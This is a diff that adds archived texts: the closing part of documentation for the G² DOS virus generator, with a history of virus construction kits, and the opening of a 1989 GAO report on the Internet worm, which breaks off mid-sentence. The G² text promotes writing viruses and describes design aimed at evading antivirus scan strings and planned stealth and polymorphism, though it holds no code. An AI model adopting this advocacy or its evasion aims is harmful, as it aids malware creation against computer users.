+       Aside from  the inherent power of the code generator, the data file is
+  also an  integral part  of the  G� package.   Since it is written in the G�
+  metalanguage, it  is easily  upgraded and maintainable.  It is an easy task
+  to redesign  the structure  of the  viruses generated  by G�; it's a simple
+  matter of  rearranging the  various routines.   This  allows for  both more
+  variety in  the generated  viruses as  well as increasing the difficulty of
+  finding a single generic scan string for G�.
+  
+  STILL NO IDE (INTEGRATED DEVELOPMENT ENVIRONMENT)
+  
+  "
+       Everyone agrees  that Microsoft  Windows is  for cripples.  Obviously,
+  you, the  user of  the PS-MPC, are no cripple, so you need no puny IDE with
+  colourful, deluxe  windows to  aid you.  If you are a cripple, go ahead and
+  
+                                                                     1
+
+  create the  configuration file in your favorite Windows text editor.  Hell,
+  port the  code to  the Macintosh  and you  can be  truly crippled (although
+  you'll have your pretty windows and icons).
+  "
+                         - From the PS-MPC documentation
+  
+       Creating an  IDE nowadays  is merely  an exercise in running a package
+  designed for  generating a  snazzy interface.   Naturally, this is entirely
+  unnecessary and  may not  even be  wanted in many instances, as an IDE adds
+  tremendous amounts  of extra code accompanied with a tremendous decrease in
+  execution speed.   It's  pretty stupid  to put  an IDE in a code generator;
+  there's simply no need.
+  
+       Several analogies  come to  mind.  The first, of course, is that using
+  an IDE  is akin to a walking person intentionally crippling his own legs or
+  a sighted  person poking  her own  eyes out.  Using an IDE for no reason is
+  like sitting  on a  porcupine, bashing yourself over the head with a brick,
+  or jabbing  yourself in the belly with a hot poker for no reason; it's just
+  not a good idea.
+  
+       You want  Windows compatability?   You want customizable colours?  You
+  want CUA/SAA-compliant  pull-down menus?  Then go write your own interface.
+  You want  speed?  You want tight code generation?  You want to learn how to
+  write viruses?  Then G� will do the job nicely.
+  
+  MODIFICATION OF GENERATED FILES
+  
+       You are  encouraged to alter the generated source code files.  You may
+  add to  the code  in any  way except  for the  addition of  malicious code.
+  That's a  no no and is frowned upon.  The source code is commented for easy
+  modification.   Everything is open for modification except for the creation
+  signature string, [PS/G�].  Leave it in.
+  
+       Note that  G� includes absolutely no destructive routines in it.  This
+  ensures that  those who use G� must do the dirty work themselves.  Any knob
+  can write  a hard  drive trashing  routine or  rip such  a routine out of a
+  trojan; heck,  any programmer  worth his  salt can  write one in his sleep.
+  Remember that  G� is designed not for destruction, but rather for learning.
+  In the hands of a knowledgeable user, G� may be quite powerful.
+  
+  UPGRADES
+  
+       Although the G� package is designed as a virus creator, it is really a
+  generic code  generator.  The G2.COM file processes the G2.DAT data file to
+  create the  virus.   The executable  contains no  inherently virus-oriented
+  data; it  is all contained in the data file.  This is the key to G�'s power
+  and ease of upgrade.
+  
+       Thus, two  types of upgrades are possible with G2: code and data file.
+  Code file  upgrades refer  to changes in the G2.COM file itself.  This will
+  occur periodically  as improvements  are needed.   Data  file upgrades  are
+  changes in  the G2.DAT  file.  Note that data files are NOT and will NOT be
+  compatible across  different  versions  of  G�.    This  is  to  allow  for
+  improvements to the file format which may be made during a code upgrade.
+  
+       Each release  of the  code file will be accompanied with a new release
+  of the  data file.   This does not necessarily mean that the data module is
+  improved; it  is simply a convenience to the user.  The filename of G� code
+  file releases  will be  of the format G2-CXXXY.ZZZ where XXX is the version
+  number, Y  is either blank or a 'B' to designate a beta release, and ZZZ is
+  
+                                                                     2
+
+  the extension  of the  appropriate archive  format.   The filename  of data
+  upgrades will  be of  the form  G2-DXXXY.ZZZ where XXX is the version of G�
+  the data  file is  to be used with, Y is a version number of the data file,
+  and ZZZ  is once  again the  extension of  the appropriate  archive format.
+  This naming scheme is subject to change without notice.
+  
+  ADDITIONAL G� FILES
+  
+  Note: This  is not to be confused with the files generated by G2.COM during
+  the course  of normal operation, which are to be used freely by the user of
+  G�.
+  
+       Due to  the nature of G�, there are several files which may eventually
+  be made  available.   The first is the compiler module, which generates the
+  G2.DAT file  from several  data files.  Along with the compiler module will
+  be the data files themselves, which hold the virus code definitions used by
+  G� in  creating source  code.   These will  not be  made available for some
+  time, at  least until the data module format is stable and I've made pretty
+  much all  the improvements  that I  wish to  do.  Target version number for
+  release of  these files  is 35.2.9.31(3),  although this  may and  will  be
+  changed at will and without notice.
+  
+       I am not releasing the source code at this point simply because of all
+  the hassle  I went  through after  releasing the source to the PS-MPC.  The
+  numerous complaints  received from  people who couldn't compile it properly
+  (due to  improper setting of compiler switches) showed that it is difficult
+  to distribute  a product  in this  form.  For those that are interested, G�
+  was written  using Turbo  C 2.0, an excellent product indeed and the source
+  code was tested with Tasm 2.5.
+  
+  PROBLEMS AND FUTURE IMPROVEMENTS
+  
+       I'm much  happier with  G� and have put more heart into programming it
+  than I  had with  the PS-MPC.   Although  I was  initially excited with the
+  possibilities of  the PS-MPC,  it was  intrinsically limited and I soon saw
+  that it  would grow  too bulky  to keep up.  So I thought up of the idea of
+  the data file and so far it's been working pretty well.
+  
+       Although this  program was  written with  less frenzy than the PS-MPC,
+  (it took  3 days  versus the  2 for the PS-MPC) it may have a few remaining
+  problems, hence  the preversion  1.0, beta  designation.  The processing of
+  the configuration  file is  not contained  within the  data file; I wish to
+  change this sometime.  Additionally, I wish to add a bit more functionality
+  and variability  into the  code generation  before version  1.0.    Further
+  control of the code generation and a batch creation mode will also be added
+  before version  1.0.   A few  tidbits to  look for: true polymorphism, boot
+  block/partition table/SYS infectors, stealth features, more commenting, and
+  improved speed in data file and source code generation.
+  
+       If you should find problems of your own (euphemism for bug), then make
+  sure you  tell me  what is  wrong and it will be fixed as soon as possible.
+  If you  have a  suggestion for  an improvement  in the  code, or  even have
+  alternate code fragments, then send them to me and they may be incorporated
+  into subsequent releases of the data file.
+  
+       If you should further run into any problems in learning how to use G�,
+  then be  sure to  get word  to me.   Even post it on FidoNet if you wish; I
+  don't mind  feedback in  a public  forum.  Although I will not stoop to the
+  level of  a GUI-making,  toolkit-using programmer-drone, I will try to make
+  using G�  as simple as possible and may possibly release a tiny shell which
+  
+                                                                     3
+
+  will automatically place the appropriate parameters in a configuration file
+  suitable for use with G�.
+  
+       Of course,  if you  have any positive comments, feel free to post them
+  anywhere I'm likely to be; either leave me email at a particular board that
+  I frequent  (make sure it's the right Dark Angel) or leave a public message
+  on FidoNet  or another net that I am likely to read.  Don't be too critical
+  of ex-Senior  Engineers; they  have nothing  better to  do than  bash virus
+  writers.
+  
+  CONCLUSION
+  
+       G� represents  a new level in modern virus creation.  Although nothing
+  can possibly beat either the quality or the thrill of a hand-crafted virus,
+  the viruses  generated by G� are quite powerful and useful for learning how
+  to write your own viruses.
+  
+       Where does  it go  from here?   Only  ex-senior engineers of Data Plus
+  have been  entrusted by  the government  to know  this secret  information.
+  However, secret  agents have  infiltrated the  tight safety net surrounding
+  said senior  engineers and this knowledge will be made publically available
+  at the appropriate time.
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+                                                                     4
+
+  HISTORY OF VIRUS TOOLKITS
+  
+  Note:  The   original  text   from  which   this  was   based,  the  PS-MPC
+  documentation, has  been copied  extensively  by  journals  such  as  Virus
+  Bulletin and  presented as  their own  text.   If you  copy the text, it is
+  expected that  you cite  the source.   It's not very nice to plagiarize and
+  your mommy might scold you if she knew what you were up to.
+  
+       The first  known virus  toolkit was  called VCS, or Virus Construction
+  Set.   This program  generated a  new virus each time it was run.  However,
+  there were  no code differences at all between any two viruses generated by
+  VCS.   All viruses  generated were  1077 bytes  in length  and all could be
+  detected with  the identical  scan string.   The advantage in this approach
+  was that  the user  needed absolutely no knowledge of 8086 assembly to take
+  advantage of this program.  This program of limited usefulness spawned only
+  one well-known variant called Manta.  It is hardly worth mentioning here.
+  
+       The second  virus toolkit  was CrazySoft, Inc.'s Dark Avenger Mutation
+  Engine (MtE).   This  magnificent work  of Bulgarian  coding allowed  virus
+  authors to  create viruses  with an  almost limitless  number of decryption
+  routines.   Although the  author needed  to know how to write 8086 assembly
+  code, no  knowledge of  the inner workings of MtE save the entry parameters
+  was needed  to use  this toolkit.   It  has since  spawned several viruses,
+  including Dedicated, Pogue, Fear, and Groove.
+  
+       The next  virus toolkit  to be released was VCL, or Virus Construction
+  Laboratory.  This was written by NoWhere Man of NuKE.  This toolkit allowed
+  the user  many options,  including the creation of parasitic COM infectors,
+  overwriting COM/EXE  "infectors," spawning  EXE "infectors,"  trojan horses
+  and logic  bombs.   The only  thing missing  from this motley assortment of
+  formats was the ANSI bomb.  Since it could handle parasitic infections only
+  of the  COM file  format, it  was of  limited usefulness.  Additionally, it
+  incorporated  only   one  decryption   formula,  once  again  limiting  its
+  usefulness.   Further, the  initial release  included a quirky installation
+  program which  failed to  install properly  under certain  conditions.   An
+  errant pointer  probably contributed  to another  bug,  which  occasionally
+  caused garbled  source code  to be  produced.  Perhaps the worst bug of VCL
+  was the failure of some of the generated programs to work properly.  On the
+  bright side,  however, this package contained a colourful IDE loosely based
+  on the  Borland interface.   This  IDE was easy to use and even the average
+  Joe could  understand how  to use  it without understanding 80x86 assembly.
+  Unfortunately, the  activation routines  included with  the package were of
+  limited usefulness.   Most  of these  involved manipulating the BIOS memory
+  area at  segment 40h  and seemed  to be  mere  afterthoughts,  rather  than
+  planned "features."   Virus researchers quickly dismissed VCL's importance,
+  as it  was primarily  an overblown  Vienna hack  generator and incapable of
+  generating dangerous  viruses.   The Vienna ancestry of VCL was apparent in
+  many of its "options" such as virulence rate and PATH= tracing.  The F-Prot
+  which existed  during the  release of  VCL immediately scanned most viruses
+  created by  VCL as  Vienna hacks.   VCL  2.0, so  far merely  vaporware, is
+  rumored to  fix the previous version's many problems.  However, the package
+  will continue  to be  haunted by  its ancestry  and its inherently crippled
+  nature due to being a first generation virus creator.
+  
+       The latest  virus toolkit  was the  Phalcon/Skism  Mass-Produced  Code
+  generator (PS-MPC).   Released  shortly after VCL, this product, written by
+  Dark Angel,  had none  of the  problems associated with VCL.  Although this
+  virus generator didn't create overwriting COM/EXE "infectors," spawning EXE
+  "infectors," trojan  horses, or even logic bombs, it could handle parasitic
+  COM  and   EXE   infectors   with   ease.      It   also   had   a   random
+  
+                                                                     A
+
+  encryption/decryption algorithm,  allowing well  over 150 possible routines
+  in that  area.   Version 0.91�  incorporated both  resident and nonresident
+  infectors.   No previous  virus toolkit  could generate  resident  viruses,
+  generic or  otherwise.  Further, the PS-MPC had no IDE to cripple the user,
+  clearly an advantage, as the program lacked the overhead associated with an
+  IDE.  Thus, the PS-MPC was a good tool for learning how to write viruses as
+  well as  an excellent  method of creating good viruses.  The PS-MPC was not
+  intended  to   be  used   destructively;  no   destruction  routines   were
+  incorporated.   Therefore, irresponsible  dissemination of destructive code
+  was not  initiated; rather,  it left  the activation of the virus up to the
+  user.   Interestingly, although  released soon  after VCL  1.0, the  PS-MPC
+  version 0.90�  fulfilled the "wish list" for VCL 2.0 and the PS-MPC version
+  0.91� improved  still further, with the capability of creating full-fledged
+  resident infectors.  Another bonus was the availability of the source code,
+  which allowed extensions of the core program.
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+  
+                                                                     B
diff --git a/textfiles.com/virus/gao_rpt b/textfiles.com/virus/gao_rpt
new file mode 100644
index 00000000..d9b05133
--- /dev/null
+++ b/textfiles.com/virus/gao_rpt
@@ -0,0 +1,2375 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+   **************************************************************
+   *   This is the first GAO report to be made available over   *
+   *   the Internet.  GAO wants to know how many people         *
+   *   acquire the report this way.  If you are reading this,   *
+   *   please send mail to me <swolff@nsf.gov> and I'll keep    *
+   *   count for them.  Your name will not be saved or used.    *
+   **************************************************************
+
+ 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+United States General Accounting Office
+
+GAO                         Report to the Chairman, Subcommittee on
+                            Telecommunications and Finance,
+                            Committee on Energy and Commerce
+                            House of Representatives
+
+June 1989                   COMPUTER SECURITY
+
+                            Virus Highlights Need
+                            for improved Internet
+                            Management
+
+GAO/IMTEC-89-57
+ 
+
+                             Contents
+                                                             
+                                                            Page
+EXECUTIVE SUMMARY                                              2
+
+CHAPTER    
+   1                     INTRODUCTION                         10 
+                            Internet Evolves From             10 
+                              an Experimental Network
+                            Rapid Growth of the Internet      12
+                            Management in a Decentralized     12
+                              Environment   
+                            Future of the Internet            14
+                            Internet Virus Spread Over        15 
+                              Networks to Vulnerable    
+                              Computers
+                            Objectives, Scope, and            17
+                              Methodology
+
+   2                     VIRUS FOCUSES ATTENTION ON           19
+                           INTERNET VULNERABILITIES
+                            Impact of Virus                   19
+                            Vulnerabilities Highlighted       20
+                              by Virus
+                            Actions Taken in Response         26
+                              to Virus
+                            Conclusions                       28 
+                            Recommendation                    30
+
+  3                      FACTORS HINDERING PROSECUTION        32
+                           OF COMPUTER VIRUS CASES
+                            No Statute Specifically           32
+                              Directed at Viruses
+                            Technical Nature of Virus-        34
+                              Type Incidents May Hinder
+                              Prosecution
+                            Proposed Legislation on           35
+                              Computer Viruses and          
+                              Related Offenses              
+                            Conclusions                       36
+
+APPENDIXES
+APPENDIX   I                History of Computer Viruses       37
+APPENDIX  II                Research Aimed at Improving       43
+                              Computer and Open Network 
+                              Security 
+APPENDIX III                Major Contributors to This Report 49 
+ 
+                                  
+     
+                          Abbreviations
+
+CERT                     Computer Emergency Response Team
+DARPA                    Defense Advanced Research Projects 
+                           Agency
+FCCSET                   Federal Coordinating Council on 
+                           Science, Engineering and 
+                           Technology
+FRICC                    Federal Research Internet 
+                           Coordinating Committee
+GAO                      General Accounting Office
+HHS                      Department of Health and 
+                           Human Services
+IMTEC                    Information Management and 
+                           Technology Division
+MIT                      Massachusetts Institute 
+                           of Technology
+NASA                     National Aeronautics and Space 
+                           Administration
+NCSC                     National Computer Security Center
+NIST                     National Institute of Standards 
+                           and Technology
+NSF                      National Science Foundation
+OSTP                     Office of Science and Technology        
+                           Policy
+PC                       personal computer                       
+ 
+
+
+ 
+EXECUTIVE SUMMARY
+
+PURPOSE
+
+In November 1988, a computer program caused 
+thousands of computers on the Internet--a
+multi-network system connecting over 60,000
+computers nationwide and overseas--to shut down. 
+This program, commonly referred to as a computer
+virus or worm, entered computers and
+continuously recopied itself, consuming
+resources and hampering network operations. 
+
+Concerned about Internet security and the virus
+incident, the Chairman, Subcommittee on
+Telecommunications and Finance, House Committee
+on Energy and Commerce, asked GAO to
+
+-- provide an overview of the virus incident,
+
+-- examine issues relating to Internet security
+   and vulnerabilities, and 
+
+-- describe the factors affecting the           
+   prosecution of computer virus incidents.
+
+BACKGROUND
+
+The Internet, the main computer network used by
+the U.S. research community, comprises over 500
+autonomous unclassified national, regional, and
+local networks.  Two of the largest networks are
+sponsored by the National Science Foundation and
+the Department of Defense.  In addition, three
+other agencies operate research networks on the
+Internet.  Over the past 20 years, the Internet
+has come to play an integral role in the
+research community, providing a means to send
+electronic mail, transfer files, and access data
+bases and supercomputers.
+
+There is no lead agency or organization
+responsible for Internet-wide management. 
+Responsibility for computer security rests
+largely with the host sites that own and operate
+the computers, while each network is managed by
+the network's sponsor, such as a federal
+agency, university, or regional consortium.
+
+Plans are for the Internet to evolve into a
+faster, more accessible, larger capacity network
+system called the National Research Network. 
+The initiative to upgrade the Internet--
+described as a "super highway" for the research
+community--stems from a report by the Office of
+Science and Technology Policy.  This Office,
+headed by the President's Science Advisor, has a
+broad legislative mandate to coordinate and
+develop federal science policy.
+
+In recent years, the public has become
+increasingly aware of computer virus-type
+programs that can multiply and spread among
+computers.  The Internet virus differed from
+earlier viruses (which primarily attacked
+personal computers) in that it was the first to
+use networks to spread, on its own, to
+vulnerable computer systems.
+
+There is no federal statute that specifically
+addresses virus-type incidents.  Forty-eight
+states have enacted laws dealing with computer
+crime.
+_____________________________________________________________________
+RESULTS IN BRIEF
+
+Within hours after it appeared, the Internet
+virus had reportedly infected up to 6,000
+computers, clogging systems and disrupting most
+of the nation's major research centers.  After 2
+days, the virus was eradicated at most sites,
+largely through the efforts of university
+computer experts.  After the virus incident,
+multiple intrusions (not involving viruses) at
+several Internet sites added to concerns about
+security. 
+
+These incidents highlighted such vulnerabilities
+as (1) the lack of an Internet focal point for
+addressing security issues, (2) security
+weaknesses at some sites, and (3) problems in
+developing, distributing, and installing
+software fixes (i.e., repairs to software
+flaws).  
+
+While various agencies and groups have taken
+actions to enhance security, GAO believes that
+many of the vulnerabilities highlighted by the
+virus and subsequent intrusions require actions
+transcending those of individual agencies or
+groups.  For this reason, GAO believes a
+security focal point should be established to
+fill a void in Internet's management structure.
+
+Several factors may hinder successful
+prosecution of virus-type incidents.  For
+example, since there is no federal statute that
+specifically makes such conduct a crime, other
+laws must be applied.  In addition, the
+technical nature of such cases may make it
+difficult to proceed to trial.
+
+
+
+
+
+
+PRINCIPAL FINDINGS
+
+Internet Virus 
+Incident
+
+The onset of the virus was extremely swift. 
+Within an hour after it appeared, the virus was
+reported at many sites, and by early morning, 
+November 3, thousands of computers were infected
+at such sites as the Department of Energy's
+Lawrence Livermore National Laboratory, the
+National Aeronautics and Space Administration's
+Ames Research Center, the Massachusetts
+Institute of Technology, Purdue University, and
+the University of Maryland.
+
+The virus spread over networks largely by
+exploiting (1) two holes (flaws) in systems
+software used by many computers on the networks
+and (2) weaknesses in host site security
+policies, such as lax password management.
+
+The primary effects of the virus were lost
+computer processing and staff time.  However,
+while apparently no permanent damage was done, a
+few changes to the virus program could have
+resulted in widespread damage and compromise of
+sensitive or private information.
+
+Vulnerabilities
+Highlighted
+                                             
+The lack of an Internet security focal point
+created difficulties in responding to the
+virus.  For example, problems were reported
+in communicating information about the virus
+to sites, coordinating emergency response
+activities, and distributing fixes to
+eradicate the virus. 
+
+The virus also exploited security weaknesses
+at some sites.  For example, the incident
+showed that some sites paid insufficient
+attention to security issues, such as proper
+password usage, and lacked system management
+expertise for dealing with technical issues. 
+
+In addition, problems were highlighted in
+developing, distributing, and installing
+software fixes for known flaws.  For
+example, vendors are not always timely in
+repairing software holes that may create
+security vulnerabilities.  Further, even
+when fixes are available, sites may not
+install them, through either neglect or lack
+of expertise.  In the subsequent intrusions,
+intruders entered several computer systems by
+exploiting a known software hole.  In one
+case, the vendor had not supplied the fix for
+the hole, and in the other, the fix was
+supplied but not installed.
+
+Since the virus incident, agencies and groups
+have taken actions, such as creating computer
+emergency response centers and issuing ethics
+statements to heighten users' moral
+awareness.  These actions are an important
+part of the overall effort needed to upgrade
+Internet security.  However, GAO believes
+that a focal point is needed to provide the
+oversight, coordination, and policy-making
+capabilities necessary to adequately address
+Internet's security vulnerabilities.  Since
+no one organization is responsible for
+Internet-wide management and the Office of
+Science and Technology Policy has taken a
+leadership role in initiating plans for a
+National Research Network, GAO believes that
+the Office would be the most appropriate body
+to coordinate the establishment of a security
+focal point.
+
+
+
+
+
+
+
+
+
+
+
+Prosecution
+Problems
+
+To prosecute computer virus-type incidents on
+the federal level, such laws as the Computer
+Fraud and Abuse Act of 1986 (18 U.S.C. 1030) or
+the Wire Fraud Act (18 U.S.C. 1343) may be used. 
+However, the 1986 act, the law most closely
+related to computer virus-type cases, is
+relatively new, untried with respect to virus-
+type offenses, and contains terms that are not
+defined.  Also, the evidence in such cases tends
+to be highly technical, requiring prosecutors to
+devote much time and resources preparing for
+them.
+_____________________________________________________________________
+RECOMMENDATIONS
+
+To help ensure the necessary improvements to 
+Internet-wide security are achieved, GAO
+recommends that the President's Science Advisor,
+Office of Science and Technology Policy,
+coordinate the establishment of an interagency
+group, including representatives from the
+agencies that fund research networks on the
+Internet, to serve as the Internet security
+focal point.  This group should
+
+-- provide Internet-wide security policy,      
+   direction, and coordination;
+
+-- support ongoing efforts to enhance Internet  
+   security;
+
+-- obtain input and feedback from Internet      
+   users, software vendors, technical advisory  
+   groups, and federal agencies regarding      
+   security issues; and
+
+-- become an integral part of whatever structure
+   emerges to manage the National Research      
+   Network.
+
+
+
+
+AGENCY COMMENTS
+
+As requested, GAO did not obtain official agency
+comments on this report.  However, the views of
+officials from the Defense Department, National
+Science Foundation, and the Office of Science
+and Technology Policy were obtained and
+incorporated in the report where appropriate.
+ 
+
+                           CHAPTER 1
+
+                          INTRODUCTION
+
+     On Wednesday, November 2, 1988, a virus** appeared on the
+Internet, the main computer network system used by U.S.
+researchers.  The virus reportedly infected up to 6,000
+computers, consuming resources and hampering network operations. 
+The Internet, an unclassified multi-network system connecting
+over 500 networks and over 60,000 computers nationwide and
+overseas, has come to play an integral role within the research
+community.  A user on any one of the thousands of computers
+attached to any Internet network can reach any other user and has
+potential access to such resources as supercomputers and data
+bases.  This chapter presents an overview of the Internet--how it
+evolved, how it is used and managed, and what plans there are for
+its further development--as well as a description of the events
+surrounding the Internet virus.
+
+  ** Although there is no standard definition, technical
+     accounts sometimnes use the term "worm" rather than
+     "virus" to refer to the self-propagating program
+     introduced on November 2.  The differences between
+     the two are subtle, the essential one being that
+     worms propagate on their own while viruses, narrowly
+     interpreted, require human involvement (usually
+     unwitting) to propagate.  However, their effects can
+     be identical.  We have chosen to use the term virus
+     in deference to popular use.
+
+INTERNET EVOLVES FROM AN EXPERIMENTAL NETWORK
+
+     The Internet began as an experimental, prototype network
+called Arpanet, established in 1969 by the Department of
+Defense's Defense Advanced Research Projects Agency (DARPA). 
+Through Arpanet, DARPA sought to demonstrate the possibilities of
+computer networking based on packet-switching technology.**
+Subsequently, DARPA sponsored several other packet-switching
+networks.  In the 1970s, recognizing the need to link these
+networks, DARPA supported the development of a set of procedures
+and rules for addressing and routing messages across separate
+networks.  These procedures and rules, called the "Internet
+protocols," provided a universal language allowing information to
+be routed across multiple interconnected networks.  
+
+  ** Packet switching is a technique for achieving economical
+     and effective communication among computers on a
+     network.  It provides a way to break a message into
+     small units, or packets, for independent transmission
+     among host computers on a network, so that a single
+     communicatin channel can be shared by many users.  Once
+     the packets reach their final destination, they are
+     reassembled into the complete message.
+
+     From its inception, Arpanet served as a dual-purpose
+network, providing a testbed for state-of-the-art computer
+network research as well as network services for the research
+community.  In the 1980s, the number of networks attached to
+Arpanet grew as technological advances facilitated network
+connections.  By 1983 Arpanet had become so heavily used that
+Defense split off operational military traffic onto a separate
+system called Milnet, funded and managed by the Defense
+Communications Agency.  Both Arpanet and Milnet are unclassified
+networks.  Classified military and government systems are
+isolated and physically separated from these networks. 
+
+     Building on existing Internet technology, the National
+Science Foundation (NSF), responsible for nurturing U.S. science
+infrastructure, fostered the proliferation of additional
+networks.  In 1985, NSF made the Internet protocols the standard
+for its six supercomputing centers and, in 1986, funded a
+backbone network--NSFnet--linking the six centers.**  NSF also
+supported a number of regional and local area campus networks
+whose network connections were facilitated through NSF funding.***
+As of September 1988, there were about 290 campus networks
+connected to NSFnet through about 13 regional networks.  Many of
+these networks also connect to Arpanet.
+
+  ** A backbone network is a network to which smaller
+     networks are attached.  Arpanet and Milnet are also
+     backbone networks.
+
+ *** Regional networks include partial-statewide networks
+     (e.g., Bay Area Regional Research Network in northern
+     California), statewide networks (e.g., New York State
+     Educational Research Network), and multi-state networks
+     (e.g., Southern Universities Research Association
+     Network).
+
+     Other federal agencies fund research networks.  The
+Department of Energy, the National Aeronautics and Space
+Administration (NASA), and the Department of Health and Human
+Services (HHS) operate networks on the Internet that support
+their missions.
+
+     This loosely organized web of interconnected networks--
+including Arpanet, Milnet, NSFnet, and the scores of local and
+regional networks that use the Internet protocols--make up the
+Internet.  The Internet supports a vast, multi-disciplinary
+community of researchers, including not only computer scientists
+but physicists, electrical engineers, mathematicians, medical
+researchers, chemists, and astronomers.  
+
+     Researchers use the Internet for a variety of functions;
+electronic mail, which provides a way of sending person-to-person
+messages almost instantaneously, is the most frequent use.  Using
+electronic mail, researchers separated by thousands of miles can
+collaborate on projects, sharing results and comments daily. 
+Other uses of the Internet include file transfer and remote
+access to computer data banks and supercomputers.  Access to
+supercomputers has had a dramatic impact on scientific endeavors;
+experiments that took years to complete on an ordinary computer
+can take weeks on a supercomputer.  Currently, use of the
+Internet is generally free-of-charge to individuals engaged in
+government-sponsored research.
+
+RAPID GROWTH OF THE INTERNET
+
+     The Internet's transition from a prototype network to a
+large-scale multi-network has been rapid, far exceeding
+expectations.  In the past 5 years, its growth has been
+particularly dramatic.  For example:
+
+     -- In late 1983, the Internet comprised just over 50
+        networks; by the end of 1988, the number had grown to
+        over 500.  
+
+     -- In 1982, about 200 host computers were listed in a
+        network data base; by early 1987, there were about
+        20,000, and by early 1989 the number exceeded 60,000.**
+
+  ** Host computers, which include supercomputers, mainframes,
+     and minicomputers, are the machines,attached to the
+     networks, that run application programs.
+
+     -- An October 1988 NSF network publication estimated that
+        there were over half a million Internet users.**
+
+  ** "NSF Network News", No. 5, NSF Network Service Center,
+     Oct, 1988.
+
+     Funding for Internet operations comes from the five agencies
+(DARPA, NSF, Energy, NASA, and HHS) involved in operating
+research networks and from universities, states, and private
+companies involved in operating and participating in local and
+regional networks.  A 1987 Office of Science and Technology
+Policy (OSTP) report estimated federal funding to be
+approximately $50 million.  A national information technology
+consortium official estimated that university investments in
+local and regional networks are in the hundreds of millions of
+dollars; state investments are estimated in the millions and
+rapidly growing.**
+
+  ** Industry also invests in local and regional networks;
+     however, the amount of that investment could not be
+     determined.
+
+MANAGEMENT IN A DECENTRALIZED ENVIRONMENT
+
+     Management of the Internet is decentralized, residing
+primarily at the host site and individual network levels.  Early
+in the Internet's development, responsibility for managing and
+securing host computers was given to the end-users--the host
+sites, such as college campuses and federal agencies, that owned
+and operated them.  It was believed that the host sites were in
+the best position to manage and determine a level of security
+appropriate for their systems.  Further, DARPA's (Arpanet's
+developer and the major federal agency involved in the Internet
+in its early years) primary function was in fostering research in
+state-of-the-art technology rather than operating and managing
+proven technology.
+
+     At each host site, there may be many host computers.**  These
+computers are controlled by systems managers who may perform a
+variety of security-related functions, including
+
+     -- establishing access controls to computers through
+        passwords or other means;
+
+     -- configuration management, enabling them to control the
+        versions of the software being used and how changes to
+        that software are made;
+
+     -- software maintenance to ensure that software holes
+        (flaws) are repaired; and 
+
+     -- security checks to detect and protect against
+        unauthorized use of computers.
+
+  ** For example, at the University of California, Berkeley,
+     there are over 2,000 host computers.
+
+Operational Management at the Network Level
+
+     Each of the Internet's more than 500 networks maintains
+operational control over its own network, be it a backbone
+network (such as NSFnet), a regional network, or a local area
+network.  Distributed responsibility allows for use of different
+technologies as well as different types of administration.  Each
+network is autonomous and has its own operations center that
+monitors and maintains its portion of the Internet.  In addition,
+some of the larger networks maintain information centers that
+provide information on network use and resources. 
+
+No Internet-wide Management
+
+     No one agency or organization is responsible for overall
+management of the Internet.  According to a DARPA official,
+decentralization provided the needed flexibility for the
+Internet's continuing growth and evolution.  Within the Internet,
+networks operated by government agencies serve as backbones to
+connect autonomous regional and local (campus) networks.  Agency
+backbone networks were established with agency missions in mind,
+and their structures and modes of operation generally reflect
+individual agency philosophies.
+
+     In the fall of 1987, representatives of the five federal
+agencies--DARPA, NSF, Energy, NASA, HHS--that operate Internet
+research networks joined forces to form the Federal Research
+Internet Coordinating Committee (FRICC).  The objectives of this
+informal group include coordinating network research and
+development, facilitating resource sharing, reducing operating
+costs, and consolidating requirements for international
+connections of the participating agencies.  Currently, FRICC is
+involved in developing plans to upgrade the Internet and improve
+services.
+
+FUTURE OF THE INTERNET
+
+     The Internet, long characterized by growth and change, is
+evolving into an enhanced, upgraded system to be called the
+National Research Network.  Plans are for the enhanced network
+system to serve as a superhighway that would run faster, reach
+farther, and be more accessible than any other computer network
+system in the world.  
+
+     The National Research Network will include a number of high-
+speed networks, including NSFnet, Defense Research Internet, and
+other research networks funded by NASA, Energy, and HHS.**  The
+networks will use a shared, cross-country, high-capacity link
+called the Research Interagency Backbone.
+
+  ** Within the next few years, Arapnet will be replaced as
+     an all-purpose network by NSFnet.  A Defense Research
+     Internet will be created for experimental work in
+     computer networking.
+
+     The initiative for an upgraded network stemmed from two
+high-level studies prepared by the Office of Science and
+Technology Policy and an ad hoc committee of the National
+Research Council.**  OSTP has a broad mandate to coordinate and
+develop federal science policy.  Within OSTP, the Congress
+established the Federal Coordinating Council on Science,
+Engineering and Technology (FCCSET) to initiate interagency
+consideration of broad national issues and coordinate government
+programs.  
+
+  ** "A Research and Development Strategy for High Performance
+     Computing", Office of Science and Technology Policy
+     (Washington, D.C., Nov. 1987), and "Toward a National
+     Research Network", National Network Review Committee,
+     National Academy Press (Washington, D.C., 1988).
+
+     Both studies noted the critical importance of a modern,
+high-speed research network in providing for research and
+technology development.  They concluded that current network
+technology did not adequately support scientific collaboration
+and that U.S. networks, commercial and government-sponsored, were
+not coordinated, had insufficient capacity, and did not assure
+privacy.  The studies recommended that a national research
+network be established to improve network capabilities.  The
+Chairman of the FCCSET Subcommittee on Networking has asked FRICC
+to develop a coordinated, multi-agency implementation plan for
+the National Research Network.   
+     
+     FRICC has taken some initial steps toward upgrading the
+Internet.  FRICC's NSF representative has agreed to take the lead
+in organizing the National Research Network, coordinating multi-
+agency efforts and the development of long-term management plans. 
+In early 1989, NSF sent out a request for proposals to provide
+and manage the Research Interagency Backbone.  
+
+INTERNET VIRUS SPREAD OVER
+NETWORKS TO VULNERABLE COMPUTERS
+
+     The Internet virus, which entered computers and continuously
+recopied itself, was not the first virus-type program to infect
+computers.  However, it differed from earlier viruses in several
+key respects.  First, previous viruses were almost always limited
+to personal computers (PCs), whereas the Internet virus infected
+larger systems, such as minicomputers, workstations, and
+mainframes.  In addition, the Internet virus was the first to
+spread over a network automatically (i.e., without requiring
